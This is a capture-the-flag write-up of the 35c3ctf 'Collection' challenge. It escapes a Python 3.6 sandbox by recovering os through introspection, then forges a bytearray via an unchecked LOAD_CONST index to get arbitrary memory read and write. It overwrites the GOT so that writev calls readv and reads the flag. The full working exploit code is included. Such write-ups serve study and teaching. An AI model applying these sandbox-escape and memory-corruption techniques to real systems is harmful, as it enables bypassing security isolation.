35c3ctf: Collection - an Unintended Solution!
By David Buchanan, 30th December 2018
The challenge provided the following files:
dist/ dist/server.py dist/Collection.cpython-36m-x86_64-linux-gnu.so dist/test.py dist/python3.6 dist/libc-2.27.so
server.py
is a python script which accepts some user input. It also opens the
flag for you and uses dup2
to duplicate the file descriptor to fd 1023.
Then, it executes your input with the provided python3.6
interpreter.
One small catch is that the following snippet is prepended to your code:
1 2 3 4 5 6 7 | from sys import modules del modules['os'] import Collection keys = list(__builtins__.__dict__.keys()) for k in keys: if k != 'id' and k != 'hex' and k != 'print' and k != 'range': del __builtins__.__dict__[k] |
This code attemps to set up a basic Python sandbox. The general idea behind this challenge is to escape the sandbox so that you can read the flag from the already opened file descriptor.
The intended solution is to exploit the custom Collection module which has been made. However, my solution doesn't use it at all :P
First, lets look at what the sandbox prefix actually does:
It deletes
os
fromsys.modules
.It imports the
Collection
native module.It deletes every builtin function from the
__builtins__
object, except for a few:id
,hex
,print
andrange
- presumably because the challenge author was feeling generous.
The first step to my unintended solution revolves around the fact that sandboxing
python is very hard to do properly. Removing an object from sys.modules
or
__builtins__
doesn't actually irreversably delete it. There will
still be plenty of references to them lying around, we just have to search a bit
for them.
I used introspection to get back some of the basic builtins to maintain my sanity:
1 2 3 | str = "".__class__ bytes = b"".__class__ bytearray = [x for x in b"".__class__.__base__.__subclasses__() if "bytearray" in str(x)][0] |
Getting back os
was a bit more tricky, but still doable:
1 | os = [t for t in ().__class__.__bases__[0].__subclasses__() if 'ModuleSpec' in t.__name__][0].__repr__.__globals__['sys'].modules["os.path"].os |
(This one is probably a bit more complex than it needs to be, but hey, it works...)
Now that we have os
, we can just call os.read(1023, 100)
right?
Unfortunately if we try that, we get the following output:
Bad system call (core dumped)
What's going on? It turns out that the Collection module sets up a seccomp filter, which restricts what syscalls we can use.
I used seccomp-tools in order to extract the filters:
$ seccomp-tools dump "./python3.6 -c 'import Collection'" line CODE JT JF K ================================= 0000: 0x20 0x00 0x00 0x00000004 A = arch 0001: 0x15 0x01 0x00 0xc000003e if (A == ARCH_X86_64) goto 0003 0002: 0x06 0x00 0x00 0x00000000 return KILL 0003: 0x20 0x00 0x00 0x00000000 A = sys_number 0004: 0x15 0x00 0x01 0x0000003c if (A != exit) goto 0006 0005: 0x06 0x00 0x00 0x7fff0000 return ALLOW 0006: 0x15 0x00 0x01 0x000000e7 if (A != exit_group) goto 0008 0007: 0x06 0x00 0x00 0x7fff0000 return ALLOW 0008: 0x15 0x00 0x01 0x0000000c if (A != brk) goto 0010 0009: 0x06 0x00 0x00 0x7fff0000 return ALLOW 0010: 0x15 0x00 0x01 0x00000009 if (A != mmap) goto 0012 0011: 0x05 0x00 0x00 0x00000011 goto 0029 0012: 0x15 0x00 0x01 0x0000000b if (A != munmap) goto 0014 0013: 0x06 0x00 0x00 0x7fff0000 return ALLOW 0014: 0x15 0x00 0x01 0x00000019 if (A != mremap) goto 0016 0015: 0x06 0x00 0x00 0x7fff0000 return ALLOW 0016: 0x15 0x00 0x01 0x00000013 if (A != readv) goto 0018 0017: 0x06 0x00 0x00 0x7fff0000 return ALLOW 0018: 0x15 0x00 0x01 0x000000ca if (A != futex) goto 0020 0019: 0x06 0x00 0x00 0x7fff0000 return ALLOW 0020: 0x15 0x00 0x01 0x00000083 if (A != sigaltstack) goto 0022 0021: 0x06 0x00 0x00 0x7fff0000 return ALLOW 0022: 0x15 0x00 0x01 0x00000003 if (A != close) goto 0024 0023: 0x06 0x00 0x00 0x7fff0000 return ALLOW 0024: 0x15 0x00 0x01 0x00000001 if (A != write) goto 0026 0025: 0x05 0x00 0x00 0x00000037 goto 0081 0026: 0x15 0x00 0x01 0x0000000d if (A != rt_sigaction) goto 0028 0027: 0x06 0x00 0x00 0x7fff0000 return ALLOW 0028: 0x06 0x00 0x00 0x00000000 return KILL ... --- SNIP - relatively unimporant secondary checks omitted --- ... 0098: 0x06 0x00 0x00 0x00000000 return KILL
TL;DR, we can use the following syscalls:
exit exit_group brk munmap mremap readv futex signalstack close rt_sigaction
We can also write
to stderr
and stdout
(I think?), and also use mmap
under certain
conditions that I couldn't be bother to decode (we won't be needing this anyway).
The most important thing, which we will need in order to read the flag is readv
.
readv
is very similar to the read
syscall, except it can perform multiple reads
into an array of buffers, all at once. We should be able to use this to read the flag
(making use of some of the previously sandboxed objects we restored earlier):
1 2 3 | flag = bytearray(128) os.readv(1023, [flag]) print(flag) |
But we are met with the following output!
Trace/breakpoint trap (core dumped)
After some more investigation, it turns out the Collection
module has one more
trick up it's sleeve! When the module is loaded, it patches the main python executable
at runtime, and overwrites most of the os_readv_impl
function with a bunch of
0xCC
instructions (debugger trap). It's clear that the author of the challenge
wanted to prevent us from solving this challenge the "easy" way - since we can't
use os.readv
any more, we will have to get some kind of native code execution
in order to call the readv
syscall ourselves.
Normally, getting native code execution in Python would be easy, just use the
ctypes
module. However, due to the seccomp restrictions we are unable to load
any additional modules. After a bit of research, I encountered this technique
for setting up an arbitrary read/write primitive by using custom Python bytecode.
It's written for python2, but we can adjust the same concept to work with our
64-bit python3.6 build. This technique looks pretty complex (it kinda reminds me
of how some WebKit exploits work), so let's break it down.
The core of this python feature/bug lies in how python interprets it's bytecode -
specifically the LOAD_CONST
opcode:
1 2 3 4 5 6 7 | /* Python/ceval.c line 1298 */ TARGET(LOAD_CONST) { PyObject *value = GETITEM(consts, oparg); Py_INCREF(value); PUSH(value); FAST_DISPATCH(); } |
The macro GETITEM(consts, oparg)
retrieves an object from index oparg
from the
consts
tuple, without any bounds checks (but only when Py_DEBUG
is not defined!).
We can exploit this as follows:
Craft a fake bytearray object on the heap.
Work out the offset from the consts tuple to a pointer-to-the-fake-bytearray.
Craft some bytecode to return a reference to our fake bytearray.
Call the custom bytecode.
Use our crafted byterray to read/write any address!
To understand the details of this, we need to look at how CPython stores tuples and bytearrays internally. I've reconstructed the following from the CPython source (The original definitions are full of macros etc.):
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 | struct PyByteArrayObject { int64_t ob_refcnt; /* can be basically any value we want */ struct _typeobject *ob_type; /* points to the bytearray type object */ int64_t ob_size; /* Number of items in variable part */ int64_t ob_alloc; /* How many bytes allocated in ob_bytes */ char *ob_bytes; /* Physical backing buffer */ char *ob_start; /* Logical start inside ob_bytes */ int32_t ob_exports; /* Not exactly sure what this does, we can ignore it */ } struct PyTupleObject { int64_t ob_refcnt; struct _typeobject *ob_type; int64_t ob_size; PyObject *ob_item[1]; /* contains ob_size elements */ } |
Step 1 is easy, we can just put some data inside a real bytearray, and it will
be stored on the heap. Step 2 is also easy - Python has a builtin function id
which returns the memory address of an object. If we add 0x20
to the address of
the real bytearray, we get the address of the ob_bytes
pointer, which will
point to our crafted fake bytearray on the heap. To get the address of the tuple's
internal object array, we can similarly just add 0x18
to the value returned by
id
, to get the address of the ob_item
array. One thing to note is that
the index into the ob_item
array that the LOAD_CONST
opcode will use is only a
signed 32-bit value - but in practise, this didn't cause any issues.
Once we have a read/write primitive, we can just replace the libc function writev
with readv
in the GOT, so that we can use the python function os.writev
in
place of os.readv
. This works due to the fact that readv
and writev
are
basically "symmetrical" in the way they work.
With that all explained, this is what my final exploit looked like:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 | # recreate things we can't import str = "".__class__ bytes = b"".__class__ bytearray = [x for x in b"".__class__.__base__.__subclasses__() if "bytearray" in str(x)][0] os = [t for t in ().__class__.__bases__[0].__subclasses__() if 'ModuleSpec' in t.__name__][0].__repr__.__globals__['sys'].modules["os.path"].os # from dis.opmap OP_LOAD_CONST = 100 OP_EXTENDED_ARG = 144 OP_RETURN_VALUE = 83 # packing utilities def p8(us): return bytes([us&0xff]) def p64(n): result = [] for i in range(0, 64, 8): result.append((n>>i)&0xff) return bytes(result) def u64(n): res = 0 for x in n[::-1]: res = (res<<8) | x return res const_tuple = () # construct the fake bytearray fake_bytearray = bytearray( p64(0x41414141) + # ob_refcnt p64(id(bytearray)) + # ob_type p64(0x7fffffffffffffff) + # ob_size (INT64_MAX) p64(0) + # ob_alloc (doesn't seem to really be used?) p64(0) + # *ob_bytes (start at address 0) p64(0) + # *ob_start (ditto) p64(0) # ob_exports (not really sure what this does) ) fake_bytearray_ptr_addr = id(fake_bytearray) + 0x20 const_tuple_array_start = id(const_tuple) + 0x18 offset = (fake_bytearray_ptr_addr - const_tuple_array_start) // 8 print(offset) # construct the bytecode bytecode = b"" for i in range(8, 32, 8)[::-1]: bytecode += p8(OP_EXTENDED_ARG) + p8(offset>>i) bytecode += p8(OP_LOAD_CONST) + p8(offset) bytecode += p8(OP_RETURN_VALUE) def foo(): pass foo.__code__ = foo.__code__.__class__( 0, 0, 0, 0, 0, bytecode, const_tuple, (), (), "", "", 0, b"" ) magic = foo() # magic is now a window into most of the address space! print(magic[0x400000:0x400000+4]) # read the elf header as a sanity check readv_got = 0x9b3d80 writev_got = 0x9b3b28 read_got = 0x9b32e8 diff = 0x116600 - 0x110070 # libc_readv - libc_read libc_read = u64(magic[read_got:read_got+8]) print("libc_read @", hex(libc_read)) libc_readv = libc_read + diff print("libc_readv @", hex(libc_readv)) # replace writev with readv in the GOT magic[writev_got:writev_got+8] = p64(libc_readv) flag = bytearray(100) flaglen = os.writev(1023, [flag]) # actually readv!!! print(flag[:flaglen]) |
PS: I found another good writeup of the LOAD_CONST
"bug" here